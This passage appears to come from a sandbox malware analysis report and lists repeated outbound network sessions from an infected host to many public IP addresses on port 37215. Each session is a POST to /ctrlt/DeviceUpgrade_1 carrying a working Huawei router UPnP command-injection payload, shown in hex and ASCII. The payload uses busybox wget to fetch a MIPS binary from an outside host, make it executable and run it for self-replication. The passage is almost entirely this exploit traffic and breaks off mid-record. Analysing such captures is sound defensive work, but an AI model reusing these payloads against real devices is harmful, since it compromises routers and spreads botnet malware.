[TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2032192.168.2.2351572145.56.97.20737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597233057 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2033192.168.2.233662460.235.219.4237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597259045 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2034192.168.2.2355694197.237.225.13037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597366095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2035192.168.2.233500441.103.196.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597367048 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2036192.168.2.235052441.166.111.21937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597387075 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2037192.168.2.235198073.160.178.13537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597435951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2038192.168.2.2358284168.108.41.17037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597436905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2039192.168.2.2346878157.169.130.12637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597517967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2040192.168.2.233281241.14.99.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597523928 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2041192.168.2.2335390157.189.15.3137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597630024 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2042192.168.2.233434041.56.159.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.597631931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
